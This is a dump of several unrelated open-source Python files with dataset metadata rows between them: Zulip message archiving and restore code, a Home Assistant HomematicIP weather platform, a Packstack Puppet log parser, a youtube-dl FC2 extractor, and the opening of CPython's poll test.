logger.info("Archiving stream messages for realm %s", realm.string_id)
retention_policy_dict: Dict[int, int] = {}
for stream in streams:
# if stream.message_retention_days is null, use the realm's policy
if stream.message_retention_days:
retention_policy_dict[stream.id] = stream.message_retention_days
else:
assert realm.message_retention_days != -1
retention_policy_dict[stream.id] = realm.message_retention_days
recipients = [stream.recipient for stream in streams]
message_count = 0
for recipient in recipients:
message_count += archive_messages_by_recipient(
recipient, retention_policy_dict[recipient.type_id], realm, chunk_size,
)
logger.info("Done. Archived %s messages.", message_count)
def archive_messages(chunk_size: int=MESSAGE_BATCH_SIZE) -> None:
logger.info("Starting the archiving process with chunk_size %s", chunk_size)
for realm, streams in get_realms_and_streams_for_archiving():
archive_stream_messages(realm, streams, chunk_size=STREAM_MESSAGE_BATCH_SIZE)
if realm.message_retention_days != -1:
archive_personal_and_huddle_messages(realm, chunk_size)
# Messages have been archived for the realm, now we can clean up attachments:
delete_expired_attachments(realm)
def get_realms_and_streams_for_archiving() -> List[Tuple[Realm, List[Stream]]]:
"""
This function constructs a list of (realm, streams_of_the_realm) tuples
where each realm is a Realm that requires calling the archiving functions on it,
and streams_of_the_realm is a list of streams of the realm to call archive_stream_messages with.
The purpose of this is performance - for servers with thousands of realms, it is important
to fetch all this data in bulk.
"""
realm_id_to_realm = {}
realm_id_to_streams_list: Dict[int, List[Stream]] = {}
# All realms with a retention policy set qualify for archiving:
for realm in Realm.objects.exclude(message_retention_days=-1):
realm_id_to_realm[realm.id] = realm
realm_id_to_streams_list[realm.id] = []
# Now we find all streams that require archiving.
# First category are streams in retention-enabled realms,
# that don't have retention explicitly disabled (through the value -1).
query_one = Stream.objects.exclude(message_retention_days=-1) \
.exclude(realm__message_retention_days=-1) \
.select_related('realm', 'recipient')
# Second category are streams that are in realms without a realm-wide retention policy,
# but have their own stream-specific policy enabled.
query_two = Stream.objects.filter(realm__message_retention_days=-1) \
.exclude(message_retention_days__isnull=True) \
.exclude(message_retention_days=-1) \
.select_related('realm', 'recipient')
query = query_one.union(query_two)
for stream in query:
realm = stream.realm
realm_id_to_realm[realm.id] = realm
if realm.id not in realm_id_to_streams_list:
realm_id_to_streams_list[realm.id] = []
realm_id_to_streams_list[realm.id].append(stream)
return [(realm_id_to_realm[realm_id], realm_id_to_streams_list[realm_id])
for realm_id in realm_id_to_realm]
def move_messages_to_archive(message_ids: List[int], realm: Optional[Realm]=None,
chunk_size: int=MESSAGE_BATCH_SIZE) -> None:
query = SQL("""
INSERT INTO zerver_archivedmessage ({dst_fields}, archive_transaction_id)
SELECT {src_fields}, {archive_transaction_id}
FROM zerver_message
WHERE zerver_message.id IN {message_ids}
LIMIT {chunk_size}
ON CONFLICT (id) DO UPDATE SET archive_transaction_id = {archive_transaction_id}
RETURNING id
""")
count = run_archiving_in_chunks(
query,
type=ArchiveTransaction.MANUAL,
message_ids=Literal(tuple(message_ids)),
realm=realm,
chunk_size=chunk_size,
)
if count == 0:
raise Message.DoesNotExist
# Clean up attachments:
archived_attachments = ArchivedAttachment.objects.filter(messages__id__in=message_ids).distinct()
Attachment.objects.filter(messages__isnull=True, id__in=archived_attachments).delete()
def restore_messages_from_archive(archive_transaction_id: int) -> List[int]:
query = SQL("""
INSERT INTO zerver_message ({dst_fields})
SELECT {src_fields}
FROM zerver_archivedmessage
WHERE zerver_archivedmessage.archive_transaction_id = {archive_transaction_id}
ON CONFLICT (id) DO NOTHING
RETURNING id
""")
return move_rows(
Message,
query,
src_db_table='zerver_archivedmessage',
returning_id=Literal(True),
archive_transaction_id=Literal(archive_transaction_id),
)
def restore_models_with_message_key_from_archive(archive_transaction_id: int) -> None:
for model in models_with_message_key:
query = SQL("""
INSERT INTO {table_name} ({dst_fields})
SELECT {src_fields}
FROM {archive_table_name}
INNER JOIN zerver_archivedmessage ON {archive_table_name}.message_id = zerver_archivedmessage.id
WHERE zerver_archivedmessage.archive_transaction_id = {archive_transaction_id}
ON CONFLICT (id) DO NOTHING
""")
move_rows(
model['class'],
query,
src_db_table=model['archive_table_name'],
table_name=Identifier(model['table_name']),
archive_transaction_id=Literal(archive_transaction_id),
archive_table_name=Identifier(model['archive_table_name']),
)
def restore_attachments_from_archive(archive_transaction_id: int) -> None:
query = SQL("""
INSERT INTO zerver_attachment ({dst_fields})
SELECT {src_fields}
FROM zerver_archivedattachment
INNER JOIN zerver_archivedattachment_messages
ON zerver_archivedattachment_messages.archivedattachment_id = zerver_archivedattachment.id
INNER JOIN zerver_archivedmessage
ON zerver_archivedattachment_messages.archivedmessage_id = zerver_archivedmessage.id
WHERE zerver_archivedmessage.archive_transaction_id = {archive_transaction_id}
GROUP BY zerver_archivedattachment.id
ON CONFLICT (id) DO NOTHING
""")
move_rows(
Attachment,
query,
src_db_table='zerver_archivedattachment',
archive_transaction_id=Literal(archive_transaction_id),
)
def restore_attachment_messages_from_archive(archive_transaction_id: int) -> None:
query = SQL("""
INSERT INTO zerver_attachment_messages (id, attachment_id, message_id)
SELECT zerver_archivedattachment_messages.id,
zerver_archivedattachment_messages.archivedattachment_id,
zerver_archivedattachment_messages.archivedmessage_id
FROM zerver_archivedattachment_messages
INNER JOIN zerver_archivedmessage
ON zerver_archivedattachment_messages.archivedmessage_id = zerver_archivedmessage.id
WHERE zerver_archivedmessage.archive_transaction_id = %(archive_transaction_id)s
ON CONFLICT (id) DO NOTHING
""")
with connection.cursor() as cursor:
cursor.execute(query, dict(archive_transaction_id=archive_transaction_id))
def restore_data_from_archive(archive_transaction: ArchiveTransaction) -> int:
logger.info("Restoring %s", archive_transaction)
# transaction.atomic needs to be used here, rather than being a wrapper on the whole function,
# so that when we log "Finished", the process has indeed finished - and that happens only after
# leaving the atomic block - Django does work committing the changes to the database when
# the block ends.
with transaction.atomic():
msg_ids = restore_messages_from_archive(archive_transaction.id)
restore_models_with_message_key_from_archive(archive_transaction.id)
restore_attachments_from_archive(archive_transaction.id)
restore_attachment_messages_from_archive(archive_transaction.id)
archive_transaction.restored = True
archive_transaction.save()
logger.info("Finished. Restored %s messages", len(msg_ids))
return len(msg_ids)
def restore_data_from_archive_by_transactions(archive_transactions: List[ArchiveTransaction]) -> int:
# Looping over the list of ids means we're batching the restoration process by the size of the
# transactions:
message_count = 0
for archive_transaction in archive_transactions:
message_count += restore_data_from_archive(archive_transaction)
return message_count
def restore_data_from_archive_by_realm(realm: Realm) -> None:
transactions = ArchiveTransaction.objects.exclude(restored=True).filter(
realm=realm, type=ArchiveTransaction.RETENTION_POLICY_BASED)
logger.info("Restoring %s transactions from realm %s", len(transactions), realm.string_id)
message_count = restore_data_from_archive_by_transactions(transactions)
logger.info("Finished. Restored %s messages from realm %s", message_count, realm.string_id)
def restore_all_data_from_archive(restore_manual_transactions: bool=True) -> None:
for realm in Realm.objects.all():
restore_data_from_archive_by_realm(realm)
if restore_manual_transactions:
restore_data_from_archive_by_transactions(
ArchiveTransaction.objects.exclude(restored=True).filter(type=ArchiveTransaction.MANUAL),
)
def restore_retention_policy_deletions_for_stream(stream: Stream) -> None:
"""
Utility function for calling in the Django shell if a stream's policy was
set to something too aggressive and the administrator wants to restore
the messages deleted as a result.
"""
relevant_transactions = ArchiveTransaction.objects \
.filter(archivedmessage__recipient=stream.recipient, type=ArchiveTransaction.RETENTION_POLICY_BASED) \
.distinct('id')
restore_data_from_archive_by_transactions(
list(relevant_transactions)
)
def clean_archived_data() -> None:
logger.info("Cleaning old archive data.")
check_date = timezone_now() - timedelta(days=settings.ARCHIVED_DATA_VACUUMING_DELAY_DAYS)
# Associated archived objects will get deleted through the on_delete=CASCADE property:
count = 0
transaction_ids = list(ArchiveTransaction.objects.filter(
timestamp__lt=check_date).values_list("id", flat=True))
while len(transaction_ids) > 0:
transaction_block = transaction_ids[0:TRANSACTION_DELETION_BATCH_SIZE]
transaction_ids = transaction_ids[TRANSACTION_DELETION_BATCH_SIZE:]
ArchiveTransaction.objects.filter(id__in=transaction_block).delete()
count += len(transaction_block)
logger.info("Deleted %s old ArchiveTransactions.", count)
def parse_message_retention_days(
value: Union[int, str],
special_values_map: Mapping[str, Optional[int]],
) -> Optional[int]:
if isinstance(value, str) and value in special_values_map.keys():
return special_values_map[value]
if isinstance(value, str) or value <= 0:
raise RequestVariableConversionError('message_retention_days', value)
assert isinstance(value, int)
return value
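# Illustrative usage sketch; the special-values mapping below is a made-up
# example, not necessarily what callers of this function actually pass in:
#
#   parse_message_retention_days("forever", {"forever": -1})  # -> -1
#   parse_message_retention_days(30, {"forever": -1})         # -> 30
#   parse_message_retention_days(0, {"forever": -1})          # raises RequestVariableConversionError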
| apache-2.0 | 8,044,793,871,342,519,000 | 41.713826 | 116 | 0.678899 | false |
aequitas/home-assistant | homeassistant/components/homematicip_cloud/weather.py | 4 | 2991 |
"""Support for HomematicIP Cloud weather devices."""
import logging
from homematicip.aio.device import (
AsyncWeatherSensor, AsyncWeatherSensorPlus, AsyncWeatherSensorPro)
from homematicip.aio.home import AsyncHome
from homeassistant.components.weather import WeatherEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import TEMP_CELSIUS
from homeassistant.core import HomeAssistant
from . import DOMAIN as HMIPC_DOMAIN, HMIPC_HAPID, HomematicipGenericDevice
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the HomematicIP Cloud weather sensor."""
pass
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry,
async_add_entities) -> None:
"""Set up the HomematicIP weather sensor from a config entry."""
home = hass.data[HMIPC_DOMAIN][config_entry.data[HMIPC_HAPID]].home
devices = []
for device in home.devices:
if isinstance(device, AsyncWeatherSensorPro):
devices.append(HomematicipWeatherSensorPro(home, device))
elif isinstance(device, (AsyncWeatherSensor, AsyncWeatherSensorPlus)):
devices.append(HomematicipWeatherSensor(home, device))
if devices:
async_add_entities(devices)
class HomematicipWeatherSensor(HomematicipGenericDevice, WeatherEntity):
"""representation of a HomematicIP Cloud weather sensor plus & basic."""
def __init__(self, home: AsyncHome, device) -> None:
"""Initialize the weather sensor."""
super().__init__(home, device)
@property
def name(self) -> str:
"""Return the name of the sensor."""
return self._device.label
@property
def temperature(self) -> float:
"""Return the platform temperature."""
return self._device.actualTemperature
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def humidity(self) -> int:
"""Return the humidity."""
return self._device.humidity
@property
def wind_speed(self) -> float:
"""Return the wind speed."""
return self._device.windSpeed
@property
def attribution(self) -> str:
"""Return the attribution."""
return "Powered by Homematic IP"
@property
def condition(self) -> str:
"""Return the current condition."""
if hasattr(self._device, "raining") and self._device.raining:
return 'rainy'
if self._device.storm:
return 'windy'
if self._device.sunshine:
return 'sunny'
return ''
class HomematicipWeatherSensorPro(HomematicipWeatherSensor):
"""representation of a HomematicIP weather sensor pro."""
@property
def wind_bearing(self) -> float:
"""Return the wind bearing."""
return self._device.windDirection
| apache-2.0 | -5,606,397,275,901,277,000 | 30.484211 | 78 | 0.669007 | false |
reelai/packstack | packstack/modules/puppet.py | 4 | 3854 | # -*- coding: utf-8 -*-
import logging
import os
import re
from packstack.installer.exceptions import PuppetError
# TODO: Fill logger name when logging system will be refactored
logger = logging.getLogger()
re_color = re.compile('\x1b.*?\d\dm')
re_error = re.compile(
'err:|Syntax error at|^Duplicate definition:|^Invalid tag|'
'^No matching value for selector param|^Parameter name failed:|Error:|'
'^Invalid parameter|^Duplicate declaration:|^Could not find resource|'
'^Could not parse for|^/usr/bin/puppet:\d+: .+|.+\(LoadError\)|'
'^Could not autoload|'
'^\/usr\/bin\/env\: jruby\: No such file or directory'
)
re_ignore = re.compile(
# Puppet preloads a provider using the mysql command before it is installed
'Command mysql is missing|'
# Puppet preloads a database_grant provider which fails if /root/.my.cnf
# is missing, this is ok because it will be retried later if needed
'Could not prefetch database_grant provider.*?\\.my\\.cnf|'
# Swift Puppet module tries to install swift-plugin-s3, there is no such
# package on RHEL, fixed in the upstream puppet module
'yum.*?install swift-plugin-s3'
)
re_notice = re.compile(r"notice: .*Notify\[packstack_info\]"
"\/message: defined \'message\' as "
"\'(?P<message>.*)\'")
surrogates = [
# Value in /etc/sysctl.conf cannot be changed
('Sysctl::Value\[.*\]\/Sysctl\[(?P<arg1>.*)\].*Field \'val\' is required',
'Cannot change value of %(arg1)s in /etc/sysctl.conf'),
# Package is not found in yum repos
('Package\[.*\]\/ensure.*yum.*install (?P<arg1>.*)\'.*Nothing to do',
'Package %(arg1)s has not been found in enabled Yum repos.'),
('Execution of \'.*yum.*install (?P<arg1>.*)\'.*Nothing to do',
'Package %(arg1)s has not been found in enabled Yum repos.'),
# Packstack does not cooperate with jruby
('jruby', 'Your Puppet installation uses jruby instead of ruby. Package '
'jruby does not cooperate with Packstack well. You will have to '
'fix this manually.'),
]
def validate_logfile(logpath):
"""
Check given Puppet log file for errors and raise PuppetError if there is
any error
"""
manifestpath = os.path.splitext(logpath)[0]
manifestfile = os.path.basename(manifestpath)
with open(logpath) as logfile:
for line in logfile:
line = line.strip()
if re_error.search(line) is None:
continue
error = re_color.sub('', line) # remove colors
if re_ignore.search(line):
msg = ('Ignoring expected error during Puppet run %s: %s' %
(manifestfile, error))
logger.debug(msg)
continue
for regex, surrogate in surrogates:
match = re.search(regex, error)
if match is None:
continue
args = {}
num = 1
while True:
try:
args['arg%d' % num] = match.group(num)
num += 1
except IndexError:
break
error = surrogate % args
message = ('Error appeared during Puppet run: %s\n%s\n'
'You will find full trace in log %s' %
(manifestfile, error, logpath))
raise PuppetError(message)
def scan_logfile(logpath):
"""
Returns list of packstack_info/packstack_warn notices parsed from
given puppet log file.
"""
output = []
with open(logpath) as logfile:
for line in logfile:
match = re_notice.search(line)
if match:
output.append(match.group('message'))
return output
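# Illustrative usage sketch (the log path is a made-up example):
#
#   logpath = '/var/tmp/packstack/manifests/192.168.0.1_nova.pp.log'
#   validate_logfile(logpath)   # raises PuppetError if the run logged real errors
#   notices = scan_logfile(logpath)  # packstack_info notices, in order of appearance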
| apache-2.0 | -8,770,513,043,752,566,000 | 35.704762 | 79 | 0.57836 | false |
turbokongen/home-assistant | homeassistant/components/hunterdouglas_powerview/const.py | 15 | 1749 | """Support for Powerview scenes from a Powerview hub."""
import asyncio
from aiohttp.client_exceptions import ServerDisconnectedError
from aiopvapi.helpers.aiorequest import PvApiConnectionError
DOMAIN = "hunterdouglas_powerview"
MANUFACTURER = "Hunter Douglas"
HUB_ADDRESS = "address"
SCENE_DATA = "sceneData"
SHADE_DATA = "shadeData"
ROOM_DATA = "roomData"
USER_DATA = "userData"
MAC_ADDRESS_IN_USERDATA = "macAddress"
SERIAL_NUMBER_IN_USERDATA = "serialNumber"
FIRMWARE_IN_USERDATA = "firmware"
MAINPROCESSOR_IN_USERDATA_FIRMWARE = "mainProcessor"
REVISION_IN_MAINPROCESSOR = "revision"
MODEL_IN_MAINPROCESSOR = "name"
HUB_NAME = "hubName"
FIRMWARE_IN_SHADE = "firmware"
FIRMWARE_REVISION = "revision"
FIRMWARE_SUB_REVISION = "subRevision"
FIRMWARE_BUILD = "build"
DEVICE_NAME = "device_name"
DEVICE_MAC_ADDRESS = "device_mac_address"
DEVICE_SERIAL_NUMBER = "device_serial_number"
DEVICE_REVISION = "device_revision"
DEVICE_INFO = "device_info"
DEVICE_MODEL = "device_model"
DEVICE_FIRMWARE = "device_firmware"
SCENE_NAME = "name"
SCENE_ID = "id"
ROOM_ID_IN_SCENE = "roomId"
SHADE_NAME = "name"
SHADE_ID = "id"
ROOM_ID_IN_SHADE = "roomId"
ROOM_NAME = "name"
ROOM_NAME_UNICODE = "name_unicode"
ROOM_ID = "id"
SHADE_RESPONSE = "shade"
SHADE_BATTERY_LEVEL = "batteryStrength"
SHADE_BATTERY_LEVEL_MAX = 200
STATE_ATTRIBUTE_ROOM_NAME = "roomName"
PV_API = "pv_api"
PV_HUB = "pv_hub"
PV_SHADES = "pv_shades"
PV_SCENE_DATA = "pv_scene_data"
PV_SHADE_DATA = "pv_shade_data"
PV_ROOM_DATA = "pv_room_data"
COORDINATOR = "coordinator"
HUB_EXCEPTIONS = (ServerDisconnectedError, asyncio.TimeoutError, PvApiConnectionError)
LEGACY_DEVICE_SUB_REVISION = 1
LEGACY_DEVICE_REVISION = 0
LEGACY_DEVICE_BUILD = 0
LEGACY_DEVICE_MODEL = "PV Hub1.0"
| apache-2.0 | 5,346,593,109,165,850,000 | 22.958904 | 86 | 0.744997 | false |
ludobox/ludobox | bin/migrations/set_default_state.py | 2 | 1864 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Add a default state to existing game content.
How it works :
- Scan /data folder and check whether each game's info.json has a 'state' field.
- If not, flag for update
- Ask user for confirmation (y/n)
- Rewrite info.json with state set to 'needs_review'
"""
import os
import ludobox
from ludobox import create_app
from ludobox.content import read_content
from ludobox.utils import get_resource_slug
from ludobox.flat_files import write_info_json
data_dir = os.path.join(os.getcwd(),"data")
print "CHANGES : %s"%data_dir
print "-"*10
app = create_app()
to_update = []
def confirm_choice():
confirm = raw_input( "Add 'needs_review' state to these %s folder(s) : Yes or No [y/n] ?" %len(to_update) )
if confirm != 'y' and confirm != 'n':
print("\n Invalid Option. Please Enter a Valid Option.")
return confirm_choice()
elif confirm == 'y' :
return True
elif confirm == 'n' :
return False
if __name__ == '__main__':
with app.app_context():
renames = []
for game_folder_name in os.listdir(data_dir) :
game_path = os.path.join(data_dir,game_folder_name)
if os.path.isdir(game_path):
info = read_content(game_path)
if "state" not in info.keys():
to_update.append((game_path,info))
if not len(to_update):
print "No updates needed."
exit()
if confirm_choice():
for game_path, info in to_update:
# remove file lists
info["state"] = "needs_review"
info.pop('files', None)
write_info_json(info, game_path)
print "%s content states added."%len(to_update)
else :
print 'Operation cancelled'
| agpl-3.0 | -8,533,191,821,972,472,000 | 26.014493 | 111 | 0.591202 | false |
erdincay/youtube-dl | youtube_dl/extractor/fc2.py | 6 | 4093 | #! -*- coding: utf-8 -*-
from __future__ import unicode_literals
import hashlib
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse,
compat_urllib_request,
compat_urlparse,
)
from ..utils import (
ExtractorError,
)
class FC2IE(InfoExtractor):
_VALID_URL = r'^http://video\.fc2\.com/(?:[^/]+/)*content/(?P<id>[^/]+)'
IE_NAME = 'fc2'
_NETRC_MACHINE = 'fc2'
_TESTS = [{
'url': 'http://video.fc2.com/en/content/20121103kUan1KHs',
'md5': 'a6ebe8ebe0396518689d963774a54eb7',
'info_dict': {
'id': '20121103kUan1KHs',
'ext': 'flv',
'title': 'Boxing again with Puff',
},
}, {
'url': 'http://video.fc2.com/en/content/20150125cEva0hDn/',
'info_dict': {
'id': '20150125cEva0hDn',
'ext': 'mp4',
},
'params': {
'username': '[email protected]',
'password': '(snip)',
'skip': 'requires actual password'
}
}, {
'url': 'http://video.fc2.com/en/a/content/20130926eZpARwsF',
'only_matching': True,
}]
def _login(self):
(username, password) = self._get_login_info()
if username is None or password is None:
return False
# Log in
login_form_strs = {
'email': username,
'password': password,
'done': 'video',
'Submit': ' Login ',
}
# Convert to UTF-8 *before* urlencode because Python 2.x's urlencode
# chokes on unicode
login_form = dict((k.encode('utf-8'), v.encode('utf-8')) for k, v in login_form_strs.items())
login_data = compat_urllib_parse.urlencode(login_form).encode('utf-8')
request = compat_urllib_request.Request(
'https://secure.id.fc2.com/index.php?mode=login&switch_language=en', login_data)
login_results = self._download_webpage(request, None, note='Logging in', errnote='Unable to log in')
if 'mode=redirect&login=done' not in login_results:
self.report_warning('unable to log in: bad username or password')
return False
# this is also needed
login_redir = compat_urllib_request.Request('http://id.fc2.com/?mode=redirect&login=done')
self._download_webpage(
login_redir, None, note='Login redirect', errnote='Login redirect failed')
return True
def _real_extract(self, url):
video_id = self._match_id(url)
self._login()
webpage = self._download_webpage(url, video_id)
self._downloader.cookiejar.clear_session_cookies() # must clear
self._login()
title = self._og_search_title(webpage)
thumbnail = self._og_search_thumbnail(webpage)
refer = url.replace('/content/', '/a/content/') if '/a/content/' not in url else url
mimi = hashlib.md5((video_id + '_gGddgPfeaf_gzyr').encode('utf-8')).hexdigest()
info_url = (
"http://video.fc2.com/ginfo.php?mimi={1:s}&href={2:s}&v={0:s}&fversion=WIN%2011%2C6%2C602%2C180&from=2&otag=0&upid={0:s}&tk=null&".
format(video_id, mimi, compat_urllib_request.quote(refer, safe=b'').replace('.', '%2E')))
info_webpage = self._download_webpage(
info_url, video_id, note='Downloading info page')
info = compat_urlparse.parse_qs(info_webpage)
if 'err_code' in info:
# most of the time we can still download wideo even if err_code is 403 or 602
self.report_warning(
'Error code was: %s... but still trying' % info['err_code'][0])
if 'filepath' not in info:
raise ExtractorError('Cannot download file. Are you logged in?')
video_url = info['filepath'][0] + '?mid=' + info['mid'][0]
title_info = info.get('title')
if title_info:
title = title_info[0]
return {
'id': video_id,
'title': title,
'url': video_url,
'ext': 'flv',
'thumbnail': thumbnail,
}
| unlicense | -7,322,910,195,957,540,000 | 33.982906 | 143 | 0.560225 | false |
printedheart/opencog | opencog/python/pln_old/logic.py | 32 | 12367 | from opencog.atomspace import types, Atom
from itertools import permutations
class Logic(object):
"""
A base class for chainers or other logical sytems. Contains various
logical functions inspired by the AIMA chapter on first-order
logic. They all operate directly on Atoms.
"""
def __init__(self, atomspace, log):
self.log = log
self._atomspace = atomspace
def variables(self, atom):
"""
Find all the variables in an expression (which may be
repeated)
"""
if atom.is_node():
if self.is_variable(atom):
return [atom]
else:
return []
else:
result = []
for o in atom.out:
result += self.variables(o)
return result
def get_first_node(self, atom):
"""
Using a depth first search on the link, return the first Node
found. If atom is a Node just return that.
"""
if atom.is_node() and not self.is_variable(atom):
return atom
else:
for o in atom.out:
ret = self.get_first_node(o)
if not ret is None:
return ret
return None
def get_incoming_recursive(self, atom):
inc = atom.incoming
ret = set()
ret.update(inc)
for link in inc:
ret.update(self.get_incoming_recursive(link))
return list(ret)
def new_variable(self, prefix='$pln_var_'):
return self._atomspace.add_node(types.VariableNode,
prefix,
prefixed=True)
def make_n_variables(self, N):
# Todo: The variable 'i' is never used. Use itertools.repeat()?
return [self.new_variable() for i in xrange(0, N)]
# Todo: this method is never used, should it be removed?
def find(self, template):
atoms = self.lookup_atoms(template, {})
atoms = self._atomspace.get_atoms_in_attentional_focus()
atoms = [atom for atom in atoms if self.wanted_atom(atom,
template,
ground=True)]
return atoms
# Todo: The variable 'substitution' is never used
def lookup_atoms(self, template, substitution):
if len(self.variables(template)) == 0:
return [template]
if template.type == types.VariableNode:
root_type = types.Atom
atoms = self.atomspace.get_atoms_by_type(root_type)
else:
# If the atom is a link with all variables below it, then
# lookup all links of that type. If it has any nodes
# (which aren't VariableNodes!), then lookup the incoming
# set for that node
first_node = self.get_first_node(template)
if first_node is None:
root_type = template.type
atoms = self.atomspace.get_atoms_by_type(root_type)
else:
atoms = self.get_incoming_recursive(first_node)
return atoms
def wanted_atom(self,
atom,
template,
s={},
allow_zero_tv=False,
ground=False):
if atom.av['vlti']:
return False
tv_ok = (allow_zero_tv or atom.tv.count > 0)
unifies_ok = self.unify_together(atom, template, s)
grounded_ok = not ground or len(self.variables(atom)) == 0
self.log.debug("tv_ok: {0}, unifies_ok: {1}, grounded_ok: {2}".
format(tv_ok, unifies_ok, grounded_ok))
return tv_ok and unifies_ok and grounded_ok
def unify_together(self, x, y, s):
return self.unify(x, y, s) is not None
def standardize_apart(self, atom, dic=None):
"""
Create a new link where all the variables in the link are replaced
with new variables. dic creates a mapping of old variables to new ones
"""
assert isinstance(atom, Atom)
# every time $v1 appears in the original expression, it must
# be replaced with the SAME $v1001
if dic is None:
dic = {}
if atom.is_node():
if self.is_variable(atom):
if atom in dic:
return dic[atom]
else:
var = self.new_variable(prefix='$standardize_apart_')
dic[atom] = var
return var
else:
return atom
else:
# atom is a link
outgoing = [self.standardize_apart(a, dic) for a in atom.out]
sa_link = self.change_outgoing(atom, outgoing)
return sa_link
def substitute(self, substitution, atom):
"""
Substitute the substitution s into the expression x.
Atoms are immutible; this function (like others) returns a new Link
with variables replaced by their values in @substitution
"""
assert isinstance(substitution, dict)
assert isinstance(atom, Atom)
if atom.is_node():
if self.is_variable(atom):
value = substitution.get(atom, atom)
assert isinstance(value, Atom)
return value
else:
return atom
else:
outgoing = [self.substitute(substitution, o) for o in atom.out]
return self.change_outgoing(atom, outgoing)
def substitute_list(self, substitution, atoms):
result = []
for atom in atoms:
result.append(self.substitute(substitution, atom))
return result
def unify(self, x, y, substitution={}):
"""
Unify atoms x,y with substitution s; return a substitution
that would make x,y equal, or None if x,y can not unify.
"""
self.log.debug("Trying to unify:\n{0}\n{1}".format(x, y))
if substitution is None:
result = None
elif x == y:
result = substitution
elif self.is_variable(x):
result = self._unify_variable(x, y, substitution)
elif self.is_variable(y):
result = self._unify_variable(y, x, substitution)
elif (not x.is_node()) and (not y.is_node()):
if x.type != y.type:
result = None
elif len(x.out) != len(y.out):
result = None
else:
result = self._unify_outgoing(x, y, substitution)
else:
result = None
if result is not None:
self.log.debug("Unify result:\n{0}".format(result))
else:
self.log.debug("Unable to unify")
return result
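    # Illustrative example (hypothetical atoms): unifying
    # (InheritanceLink $v1 (ConceptNode "cat")) with
    # (InheritanceLink (ConceptNode "dog") (ConceptNode "cat")) returns the
    # substitution {$v1: (ConceptNode "dog")}; unifying links of different
    # types or arities returns None.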
def _unify_outgoing(self, x, y, substitution):
assert isinstance(x, Atom)
assert isinstance(y, Atom)
if x.is_a(types.OrderedLink):
return self._unify_outgoing_ordered(x.out, y.out, substitution)
else:
return self._unify_outgoing_unordered(x.out, y.out, substitution)
def _unify_outgoing_ordered(self, x, y, substitution):
# Try to unify the first argument of x with the first argument
# of y, then recursively do the rest.
if len(x) == 0:
return substitution
else:
s_one_arg = self.unify(x[0], y[0], substitution)
return self._unify_outgoing_ordered(x[1:], y[1:], s_one_arg)
def _unify_outgoing_unordered(self, x, y, substitution):
# A simple way to unify two UnorderedLinks
# Try to unify x with every permutation of y.
# Choose the first permutation that works (if there is one).
# TODO handle this case: there is more than one permutation
# compatible with this expression,
# but only some of them (because of variables) can be used
# anywhere else
# That could only be handled by backtracking in the rest of the
# unify algorithm (but that's too complex)
# TODO this may not be the most efficient way. Shouldn't matter
# for small links though...
for new_y in permutations(y):
s = self._unify_outgoing_ordered(x, new_y, substitution)
if s is not None:
return s
return None
def _unify_variable(self, variable, atom, substitution):
if variable in substitution:
value = substitution[variable]
return self.unify(value, atom, substitution)
elif self._occurs_check(variable, atom, substitution):
return None
else:
return self.add_binding(substitution, variable, atom)
def _occurs_check(self, variable, atom, substitution):
"""
Return true if variable occurs anywhere in atom
(or in substitute(substitution, atom), if substitution has a
binding for atom).
"""
if variable == atom:
return True
elif self.is_variable(atom) and atom in substitution:
value = substitution[atom]
return self._occurs_check(variable, value, substitution)
elif atom.is_node():
return False
else:
# Check if it occurs in any sub-expressions (i.e. outgoing
# nested links)
for o in atom.out:
if self._occurs_check(variable, o, substitution):
return True
return False
assert False
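    # Illustrative example (hypothetical atoms): the occurs check above keeps
    # $v1 from unifying with (ListLink $v1 (ConceptNode "x")), because binding
    # a variable to an expression containing itself would describe an infinite
    # structure, so unify() returns None for that pair.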
def add_binding(self, substitution, variable, value):
"""
Copy the substitution and extend it by setting variable
to value; return copy.
"""
s2 = substitution.copy()
s2[variable] = value
return s2
def change_outgoing(self, link, outgoing):
"""
Returns a new link with the same type as @link but a different
outgoing set. If you pass the same outgoing set, it will return
the same Atom!
"""
return self._atomspace.add_link(link.type, outgoing)
# Todo: Should this be a static method?
def is_variable(self, atom):
return atom.is_a(types.VariableNode)
# Miscellaneous helper functions
def link(self, type, out):
return self._atomspace.add_link(type, out)
def node(self, type, name):
return self._atomspace.add_node(type, name)
# Todo: Not currently used
def transfer_atom(self, new_atomspace, atom):
"""
        Transfer (or rather copy) an atom from one atomspace to
        another. Assumes that both AtomSpaces have the same list of
        Atom types!
        Returns the equivalent of atom in new_atomspace, creating it if
        necessary, including the outgoing set of links.
"""
# The AtomSpace probably clones the TV objects, and it wouldn't
# matter much anyway
#tv = TruthValue(atom.tv.mean, atom.tv.count)
if atom.is_node():
return new_atomspace.add_node(atom.type, atom.name, tv=atom.tv)
else:
outgoing = [self.transfer_atom(new_atomspace, out)
for out in atom.out]
return new_atomspace.add_link(atom.type, outgoing, tv=atom.tv)
def _all_nonzero_tvs(self, atom_list):
for atom in atom_list:
assert atom in self._atomspace
return all(atom.tv.count > 0 for atom in atom_list)
def get_predicate_arguments(self, predicate_name):
"""
Find the EvaluationLink for the predicate, and return the list
of arguments (as a python list of Atoms). There must be only
one EvaluationLink for it
"""
var = self.new_variable()
template = self.link(types.EvaluationLink,
[self.node(types.PredicateNode, predicate_name),
var])
queries = self.lookup_atoms(template, {})
# It will often find the original template in the results!
queries.remove(template)
#queries = [query for query in queries if query.tv.count > 0]
if len(queries) != 1:
raise ValueError("Predicate " + predicate_name +
" must have 1 EvaluationLink")
return queries[0].out[1].out
| agpl-3.0 | 7,385,975,548,242,289,000 | 34.950581 | 78 | 0.560201 | false |
FireWRT/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python2.7/test/test_poll.py | 41 | 6418 | # Test case for the os.poll() function
import os
import random
import select
try:
import threading
except ImportError:
threading = None
import time
import unittest
from test.test_support import TESTFN, run_unittest, reap_threads, cpython_only
try:
select.poll
except AttributeError:
raise unittest.SkipTest, "select.poll not defined -- skipping test_poll"
def find_ready_matching(ready, flag):
match = []
for fd, mode in ready:
if mode & flag:
match.append(fd)
return match
class PollTests(unittest.TestCase):
def test_poll1(self):
# Basic functional test of poll object
# Create a bunch of pipe and test that poll works with them.
p = select.poll()
NUM_PIPES = 12
MSG = " This is a test."
